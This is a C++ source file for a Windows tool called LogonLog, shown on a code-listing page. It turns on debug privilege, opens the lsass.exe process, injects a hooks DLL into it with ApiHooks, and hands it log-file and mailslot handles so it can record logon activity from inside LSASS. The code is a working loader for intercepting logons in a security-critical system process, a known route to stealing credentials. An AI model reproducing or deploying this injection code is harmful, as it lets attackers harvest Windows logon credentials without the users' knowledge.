📄 logonlogexe.cpp
字号:
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#ifdef UNICODE
#define _UNICODE
#endif
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <tchar.h>
//#define AH_STATIC_LINKING
#include <ApiHooks.h>
#define PW_STATIC_LINKING
#include <PrcWorks.h>
#include "LogonLog.h"
/////////////////////////////////////////////////////////
BOOL Active = TRUE;
DWORD WINAPI ReadMS(HANDLE hMS) {
DWORD i;
TCHAR Msg[MS_MAX_MSG_SIZE/sizeof(TCHAR)];
while(Active)
if(ReadFile(hMS, Msg, MS_MAX_MSG_SIZE, &i, NULL))
_tprintf(Msg);
return(CloseHandle(hMS));
}
/////////////////////////////////////////////////////////
int _tmain(int argc, TCHAR** argv) {
if((argc < 2) || (argc > 3)) {
_tprintf(_T("Usage: LogonLog [/i|/u] [FileName]\n/i .. log to screen\n/u .. end logging and unload"));
return(getch());
}
else {
BOOL StayInteractive = FALSE, Unload = FALSE;
LPTSTR LogFileName = NULL;
if(argv[1][0] == '/') {
StayInteractive = (argv[1][1] | ' ') == 'i';
Unload = (argv[1][1] | ' ') == 'u';
if(argc == 3)
LogFileName = argv[2];
}
else
LogFileName = argv[1];
HANDLE hLogFile = INVALID_HANDLE_VALUE;
HANDLE hMS = INVALID_HANDLE_VALUE;
HANDLE hMSClient = INVALID_HANDLE_VALUE;
if(!Unload) {
if(LogFileName)
if((hLogFile = CreateFile(LogFileName, GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, NULL))
== INVALID_HANDLE_VALUE) {
_tprintf(_T("\nLogonLog: Can't create LogFile!"));
if(!StayInteractive)
return(getch());
}
else
SetFilePointer(hLogFile, 0, NULL, FILE_END);
if(StayInteractive)
if((hMS = CreateMailslot(MSName, MS_MAX_MSG_SIZE, 2000, NULL)) == INVALID_HANDLE_VALUE) {
_tprintf(_T("\nLogonLog: Can't create mailslot!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
else
if((hMSClient = CreateFile(MSName, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE) {
CloseHandle(hMS);
_tprintf(_T("\nLogonLog: Can't create mailslot!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
}
//debug privilege is required as always
DWORD WasEn;
DWORD Params[4] = {20, TRUE, 0, (DWORD)&WasEn};
LoadAndCall(NULL, _T("ntdll.dll"), GetCurrentProcessId(), 0, 0, _T("RtlAdjustPrivilege"), 4, Params);
//find lsass process (lives in session 0)
DWORD LSAPID = ProcessName2PID(_T("0/lsass.exe"));
HANDLE hLSA;
if((hLSA = OpenProcess(PROCESS_DUP_HANDLE, FALSE, LSAPID)) == NULL) {
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLogFile);
_tprintf(_T("\nLogonLog: Can't find/open lsass process!"));
return(getch());
}
else {
//get Hooks_DLL name assuming it's like main module name but with dll extension
TCHAR Hooks_DLL[MAX_PATH];
DWORD nc = GetModuleFileName(NULL, Hooks_DLL, sizeof(Hooks_DLL)/sizeof(TCHAR));
Hooks_DLL[nc-1] = 'L';
Hooks_DLL[nc-2] = 'L';
Hooks_DLL[nc-3] = 'D';
for(; nc && (Hooks_DLL[nc] != '\\'); nc--);
LPTSTR ShortHooks_DLL = &Hooks_DLL[nc+1];
DWORD UnloadPars[1] = {LACThreadBodyAlias};
if(Unload) {
CloseHandle(hLSA);
return(LoadAndCall(NULL, ShortHooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars));
}
if(StayInteractive) {
typedef union {
COORD coord;
WORD wsize[2];
} LCC32_COORD;
LCC32_COORD cbsize = {{80, 0x910}};
FreeConsole();
AllocConsole();
HANDLE StdOut = GetStdHandle(STD_OUTPUT_HANDLE);
while(!SetConsoleScreenBufferSize(StdOut, cbsize.coord))
cbsize.wsize[1] -= 0x10;
SetConsoleTitle(_T("LogonLog Messages (Press any key to stop logging)"));
DWORD i;
if(!CloseHandle(CreateThread(NULL, 0, ReadMS, hMS, 0, &i))) {
CloseHandle(hMS);
CloseHandle(hMSClient);
_tprintf(_T("\nLogonLog: Can't create ReadMS thread!"));
if(hLogFile == INVALID_HANDLE_VALUE)
return(getch());
}
}
DWORD AHResult = IsModuleLoaded(NULL, ShortHooks_DLL, LSAPID, 60000);
if((AHResult) && ((AHResult & 0xffff) == 0)) {
Active = FALSE;
CloseHandle(hLogFile);
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLSA);
_tprintf(_T("Already logging!"));
return(getch());
}
AHResult = EstablishApiHooks(NULL, Hooks_DLL, LSAPID, 60000);
if(AHResult != ErrorAWSuccess) {
Active = FALSE;
CloseHandle(hLogFile);
CloseHandle(hMS);
CloseHandle(hMSClient);
CloseHandle(hLSA);
_tprintf(_T("ApiHooks failed!"));
return(getch());
}
else {
HANDLE StartLogPars[2] = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE};
HANDLE hCurP = GetCurrentProcess();
if(hLogFile != INVALID_HANDLE_VALUE)
DuplicateHandle(hCurP, hLogFile, hLSA, &StartLogPars[0], 0, FALSE, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
if(hMSClient != INVALID_HANDLE_VALUE)
DuplicateHandle(hCurP, hMSClient, hLSA, &StartLogPars[1], 0, FALSE, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
CloseHandle(hLSA);
if((StartLogPars[0] == StartLogPars[1]) && (StartLogPars[1] == INVALID_HANDLE_VALUE)) {
Active = FALSE;
CloseHandle(hMS);
_tprintf(_T("DupHandle failed!"));
LoadAndCall(NULL, Hooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars);
return(getch());
}
LoadAndCall(NULL, Hooks_DLL, LSAPID, 60000, 0, _T("StartLog"), 2, StartLogPars);
if(hMSClient != INVALID_HANDLE_VALUE) {
getch();
Active = FALSE;
CloseHandle(hMS);
LoadAndCall(NULL, Hooks_DLL, LSAPID, 1, 0, _T("StopLog"), 1, UnloadPars);
}
}
}
}
return(0);
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -